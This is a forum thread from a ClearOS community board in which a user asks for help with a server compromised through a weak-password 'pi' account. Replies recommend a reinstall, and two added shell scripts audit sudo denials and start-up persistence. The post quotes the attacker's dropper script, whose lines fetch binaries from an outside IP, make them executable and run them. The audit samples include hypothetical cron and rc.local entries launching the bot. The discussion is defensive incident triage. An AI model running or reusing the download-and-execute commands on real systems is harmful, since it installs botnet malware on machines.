
Johan
Hello everyone.

tl;dr Got malware on my server, sleeping at the moment I think, can I get rid of it or is new install only option?

I have a ClearOS Community release 6.6.0 Beta (Beta 2) host running at my parents place that has most likely been infected with some kind of malware.
I've been neglecting this machine a bit when it comes to security.

Brace yourself, long post..

6 months ago their internet was quite slow and sluggish. I noticed heavy traffic on port 22, which I had accidentally left open in the firewall after I installed the server.
I blocked port 22 and things got better; now, months later, I found out why.


Many of these messages below

# cat /var/mail/root


From root@MYHOST.poweredbyclear.com Mon Sep 28 23:20:14 2015
Return-Path: <root@MYHOST.poweredbyclear.com>
X-Original-To: root
Delivered-To: root@MYHOST.poweredbyclear.com
Received: by MYHOST.poweredbyclear.com (Postfix, from userid 0)
id 3E2295C0829; Mon, 28 Sep 2015 23:20:12 +0200 (CEST)
To: root@MYHOST.poweredbyclear.com
From: pi@MYHOST.poweredbyclear.com
Auto-Submitted: auto-generated
Subject: *** SECURITY information for MYHOST.poweredbyclear.com ***
Message-Id: <20150928212013.3E2295C0829@MYHOST.poweredbyclear.com>
Date: Mon, 28 Sep 2015 23:20:12 +0200 (CEST)

MYHOST.poweredbyclear.com : Sep 28 23:20:11 : pi : user NOT in sudoers ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/bash




I can see that two users were created.


pi:x:1001:1001::/home/pi:/bin/bash
vid:x:2000:2000::/home/vid:/bin/bash


I have no memory of creating these two, but I can't say for sure. I did play around with a raspberry pi last year for a project.

In /home/pi there is a file called gb.sh that downloads files from a server and executes them, then deletes them.


wget -c http://5.49.85.44/arm4 -P /var/run && chmod +x /var/run/arm4 && /var/run/arm4
wget -c http://5.49.85.44/arm5 -P /var/run && chmod +x /var/run/arm5 && /var/run/arm5
wget -c http://5.49.85.44/arm6 -P /var/run && chmod +x /var/run/arm6 && /var/run/arm6
wget -c http://5.49.85.44/i586 -P /var/run && chmod +x /var/run/i586 && /var/run/i586
wget -c http://5.49.85.44/i686 -P /var/run && chmod +x /var/run/i686 && /var/run/i686
wget -c http://5.49.85.44/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips
wget -c http://5.49.85.44/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel
wget -c http://5.49.85.44/powerpc -P /var/run && chmod +x /var/run/arm40 && /var/run/powerpc

sleep 3;
rm -rf /var/run/ arm4 arm5 arm6 i586 i686 m68 mips mipsel powerp powerpc sh4 x86


So I think the name of the malware is [Devising's Modded Perl Bot Commands List] or something like that.

There is a very big perl script named /home/pi/.conf
This script is huge, almost 2000 lines, a bunch of functions ready to do nasty stuff if called upon.

The attacker can send commands using IRC that are then executed on my server, e.g. DDoS attacks, spam.


Using the command

#last

shows a lot of activity from the user pi from June 2015 to October 2015 (when I finally closed port 22 in the firewall).

So I don't think there has been any activity since then, can't find anything suspicious in the logs.

Now I would like to ask the more experienced people here for advice on what to look for, which log files I should examine closely, well-known ports to monitor and so on.

And is it best to make a clean install of the server next time I go there, to be sure I get rid of all malicious code?

I appreciate any help I can get.

Thanks
Friday, February 05 2016, 10:47 PM
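A small triage helper, added here as an example and not part of Johan's post or of ClearOS, that pulls the two signals described above out of the artefacts on the host: the "user NOT in sudoers" notices that sudo mails to /var/mail/root, and login-capable accounts in /etc/passwd that the administrator may not recognise. Both inputs are constructed samples written to a temp directory so the script runs offline; the second mail line, the extra accounts, and the UID floor of 500 (the RHEL 6 default that ClearOS 6 inherits) are assumptions for the sample.

```shell
#!/bin/sh
# Added triage helper (not from the thread): extracts sudo denials from a root
# mailbox and lists login-capable accounts from a passwd file.  Sample inputs
# are constructed below; on a real host point the functions at /var/mail/root
# and /etc/passwd instead.

SAMPLE_DIR=$(mktemp -d)

# Constructed sample of /var/mail/root: the denial line quoted in the post, a
# made-up second denial, and an unrelated cron mail header for noise.
cat > "$SAMPLE_DIR/root_mail" <<'EOF'
Subject: *** SECURITY information for MYHOST.poweredbyclear.com ***

MYHOST.poweredbyclear.com : Sep 28 23:20:11 : pi : user NOT in sudoers ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/bash
Subject: Cron <root@MYHOST> run-parts /etc/cron.daily
MYHOST.poweredbyclear.com : Oct  2 04:11:09 : pi : user NOT in sudoers ; TTY=unknown ; PWD=/home/pi ; USER=root ; COMMAND=/usr/sbin/useradd vid
EOF

# Constructed sample of /etc/passwd: system accounts, one legitimate user
# (johan, assumed) and the two accounts the post found.
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
johan:x:500:500::/home/johan:/bin/bash
pi:x:1001:1001::/home/pi:/bin/bash
vid:x:2000:2000::/home/vid:/bin/bash
EOF

# Number of sudo denial notices in a root mailbox.
sudo_denial_count() {
    grep -c 'user NOT in sudoers' "$1"
}

# One "user<TAB>command" line per denial, so every command the unprivileged
# account tried to run as root can be reviewed in a single pass.  sudo's mail
# body uses " : " as the field separator.
sudo_denial_attempts() {
    awk -F' : ' '/user NOT in sudoers/ {
        user = $3
        cmd  = $4
        sub(/.*COMMAND=/, "", cmd)
        printf "%s\t%s\n", user, cmd
    }' "$1"
}

# Accounts at or above the UID floor whose shell is not nologin/false.
# Default floor 500 matches RHEL 6 / ClearOS 6 (assumption); pass 1000 for
# newer distributions.  Any name here the admin cannot account for is suspect.
interactive_accounts() {
    awk -F: -v floor="${2:-500}" '
        $3 >= floor && $7 !~ /(nologin|false)$/ { print $1 }
    ' "$1"
}

echo "sudo denials: $(sudo_denial_count "$SAMPLE_DIR/root_mail")"
sudo_denial_attempts "$SAMPLE_DIR/root_mail"
echo "login accounts with UID >= 500:"
interactive_accounts "$SAMPLE_DIR/passwd"
```

The denial list is the more useful output: it shows what the intruder tried (here a shell and a useradd), which tells you what to go looking for elsewhere on the box even when every attempt was refused.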
Responses (6)
  • Accepted Answer

    Johan
    Wednesday, February 10 2016, 07:21 PM
    Marcel van Leeuwen wrote:

    Hi,

    I advise you to reinstall everything. I think that is the only way to be sure that nothing is left on the server. Maybe a bit of a paranoid solution... yes I know. :)


    Yes I agree, will most likely do that in April when I have access to it again.
  • Accepted Answer

    Johan
    Wednesday, February 10 2016, 07:20 PM
    Nick Howitt wrote:

    I don't know enough about it, but how did they get execute permissions to do things like create users if they did not have root access? This suggests to me that another account was compromised which was able to get elevated privileges through su/sudo.

    Could the intruder be getting access through ftp to dump files on your system and be using the same account to relay mail?


    I think this guy only got access to the user pi, which had the password 'password'.
    This is a standard account for the Raspberry Pi which has become extremely popular the last years. I myself have a couple that I play around with and use for some projects.
    I think that I created this account with the idea of storing some web app stuff from the Raspberry Pi on the ClearOS server.

    And everything he tried to do failed (I hope :) ) due to the fact that pi was not in the sudo group.

    I have now improved my security a bit and will keep an eye on things; hopefully I won't get attacked again.
  • Accepted Answer

    Marcel van Leeuwen
    Saturday, February 06 2016, 03:52 PM
    Hi,

    I advise you to reinstall everything. I think that is the only way to be sure that nothing is left on the server. Maybe a bit of a paranoid solution... yes I know. :)
  • Accepted Answer

    Nick Howitt
    Saturday, February 06 2016, 01:28 PM
    I don't know enough about it, but how did they get execute permissions to do things like create users if they did not have root access? This suggests to me that another account was compromised which was able to get elevated privileges through su/sudo.

    Could the intruder be getting access through ftp to dump files on your system and be using the same account to relay mail?
  • Accepted Answer

    Johan
    Saturday, February 06 2016, 10:41 AM
    Nick Howitt wrote:

    I can't advise too much as I have very little experience of this, but I would have thought a complete re-installation would be advisable. As port 22 access was obtained, I assume it was with the root user and they could have done anything. There must be something launching that script at reboot. Cron or different start up methods such as ntsysv/chkconfig or editing one of the rc files could have been used or other ways I've no idea about.

    At least if you completely reinstall then copy back in your data you won't have a rogue startup program which may reinfect you.

    [edit]
    At a minimum, delete the users and the scripts as quickly as you can. Also check for rogue processes ("ps aux", but I am not sure what to look for) and check for cron entries in /etc/cron.* and /var/spool/cron/*. I am not sure where to look for all the different auto-start options.
    [/edit]


    Hey! Thanks for your advice. I'm also thinking a new install would be a good thing to do, and it's always nice to have the latest version of ClearOS :)

    I believe the intruder never got access to my root account.

    I have had this from the start I think:

    cat /etc/ssh/sshd_config | grep PermitRootLogin
    PermitRootLogin no



    • I went thru the complete .bash_history for root, and I only found commands that I executed, dating back to the initial installation period. If the .bash_history was erased, then I would suspect something.

    • Around 40-50 mails in /var/mail/root show that the user pi tried to execute a lot of stuff using sudo, but was denied.


    I will keep looking thru some log files to get a better picture of what this intruder has done, or tried at least.
  • Accepted Answer

    Nick Howitt
    Saturday, February 06 2016, 08:56 AM
    I can't advise too much as I have very little experience of this, but I would have thought a complete re-installation would be advisable. As port 22 access was obtained, I assume it was with the root user and they could have done anything. There must be something launching that script at reboot. Cron or different start up methods such as ntsysv/chkconfig or editing one of the rc files could have been used or other ways I've no idea about.

    At least if you completely reinstall then copy back in your data you won't have a rogue startup program which may reinfect you.

    [edit]
    At a minimum, delete the users and the scripts as quickly as you can. Also check for rogue processes ("ps aux", but I am not sure what to look for) and check for cron entries in /etc/cron.* and /var/spool/cron/*. I am not sure where to look for all the different auto-start options.
    [/edit]
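Nick's checklist (cron directories, cron spools, rc files, chkconfig services) can be turned into a repeatable audit. The script below is an added example, not code from the thread or from ClearOS: it walks those start-up locations, greps them for the paths named in Johan's post (the /var/run downloads, gb.sh, the .conf bot under /home/pi), and lists oversized dotfiles in home directories. It runs against a constructed fake root; the rc.local and crontab entries in that sample are hypothetical, since the thread never established how the bot was restarted. On a real host call the functions with / as the root.

```shell
#!/bin/sh
# Added persistence audit (not from the thread).  Builds a constructed fake
# root so the example runs offline; the two "malicious" entries below are
# samples of the kind of start-up hook Nick describes, not findings from the
# actual server.

ROOT=$(mktemp -d)
mkdir -p "$ROOT/etc/rc.d" "$ROOT/etc/cron.d" "$ROOT/etc/cron.daily" \
         "$ROOT/etc/init.d" "$ROOT/var/spool/cron" "$ROOT/home/pi"

# Constructed benign entries: a cron.d job and a chkconfig-style init script.
printf '0 1 * * Sun root /usr/sbin/raid-check\n' > "$ROOT/etc/cron.d/raid-check"
printf '#!/bin/sh\n# chkconfig: 2345 10 90\n' > "$ROOT/etc/init.d/network"
# Constructed hypothetical persistence: rc.local launching the perl bot, and a
# per-user crontab for pi re-running the downloader at boot.
printf '#!/bin/sh\ntouch /var/lock/subsys/local\n/usr/bin/perl /home/pi/.conf >/dev/null 2>&1 &\n' \
    > "$ROOT/etc/rc.d/rc.local"
printf '@reboot /home/pi/gb.sh\n' > "$ROOT/var/spool/cron/pi"
seq 1 2000 > "$ROOT/home/pi/.conf"        # stands in for the ~2000-line perl script
printf 'export PATH\n' > "$ROOT/home/pi/.bashrc"

# Indicator regex built from the paths quoted in the original post.
INDICATORS='/home/pi|gb\.sh|/var/run/(arm[0-9]|i[56]86|mips|powerpc)'

# Every existing file in the usual boot/cron persistence locations.
persistence_files() {
    root=$1
    for f in "$root"/etc/rc.local "$root"/etc/rc.d/rc.local "$root"/etc/crontab \
             "$root"/etc/cron.d/* "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
             "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/* \
             "$root"/var/spool/cron/* "$root"/etc/init.d/*; do
        [ -f "$f" ] && printf '%s\n' "$f"
    done
}

# file:line:content for every persistence line matching the indicators; the
# fake root prefix is stripped so output reads like real paths.  "|| true"
# keeps a non-matching file from aborting the loop under set -e.
persistence_hits() {
    root=$1; pattern=$2
    persistence_files "$root" | while IFS= read -r f; do
        grep -HnE "$pattern" "$f" 2>/dev/null || true
    done | sed "s#^$root##"
}

# Dotfiles in home directories larger than 4 KiB: a 2000-line script posing
# as ".conf" shows up, an ordinary .bashrc does not.
large_dotfiles() {
    find "$1/home" -type f -name '.*' -size +4k | sed "s#^$1##"
}

echo "persistence entries referencing indicators:"
persistence_hits "$ROOT" "$INDICATORS"
echo "large dotfiles under /home:"
large_dotfiles "$ROOT"
```

Expect /etc/init.d to be noisy on a real system; the point of the indicator grep is that only lines referencing the known-bad paths are reported, and anything it prints from rc.local or a user's crontab is worth removing before the box is rebuilt.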